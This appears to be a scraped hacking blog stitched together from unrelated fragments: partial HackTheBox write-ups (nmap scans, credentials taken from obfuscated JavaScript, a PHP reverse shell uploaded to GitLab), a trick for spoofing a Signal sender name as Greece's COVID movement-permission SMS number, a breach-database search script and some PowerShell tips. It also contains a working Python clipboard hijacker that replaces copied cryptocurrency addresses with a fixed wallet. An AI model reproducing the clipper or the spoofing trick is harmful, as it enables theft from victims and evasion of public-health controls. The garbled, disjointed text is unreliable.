From nmap ports 22
, 80
, 443
are open
root@kali:~# nmap -sC -sV 10.10.10.127
Starting Nmap 7.60 ( https://nmap.org ) at 2019-05-14 22:07 EEST
Port 80 and 22, are open. Visiting 80 we see a gitlab server, I find the credentials http://10.10.10.114/help/bookmarks.html
at this url, and when I click Github Login, I see obfuscated javascript. I copy the code and paste it to javascript console, run it, and the get the variable content. And I get the login credentials.
I goto Profile project and upload and commit to repo a php file with reverse shell code inside of it. I then visit http://10.10.10.114/profile/shell.php. Now I get a reverse shell as www-data.
Hello fellow hackers,
From nmap scan I have 7 open ports.
# Nmap 7.80 scan initiated Wed Sep 9 05:06:25 2020 as: nmap -sC -sV -oN initial 10.10.10.197
Nmap scan report for 10.10.10.197
Host is up (0.078s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
As COVID rises you are asked to use a movement certificate form
or by sending a sms to 13033
In GREECE.
The data policy located here as per 9 April 2020 states that our message is deleted once we get the response back. And the message information is deleted or anonymized and used for statistical purposes.
If you use signal you can edit the sender number name as 13033 which will show as 13033
thus making it nearly impossible for someone to notice that this is not a number you are sending the sms to.
import os, time
import requests | |
import urllib3 | |
import sys | |
urllib3.disable_warnings() | |
payload = {'q': str(sys.argv[1]), 'size': '100', 'start': '0'} | |
r = requests.get('https://scylla.sh/search', params=payload, verify=False) | |
print(r.text) |
import re,pyperclip | |
while(1): | |
s = pyperclip.paste() | |
addr = re.findall(r"^[DT][a-km-zA-HJ-NP-Z1-9]{25,34}$",s) | |
if addr: | |
pyperclip.copy("D5kYkMmkKKNNvvEsx31FvirNT6oEyeirAi") | |
list filesystem disks
powershell -c get-psdrive -psprovider filesystem
show hidden folders
dir -Force
get hexdump from a file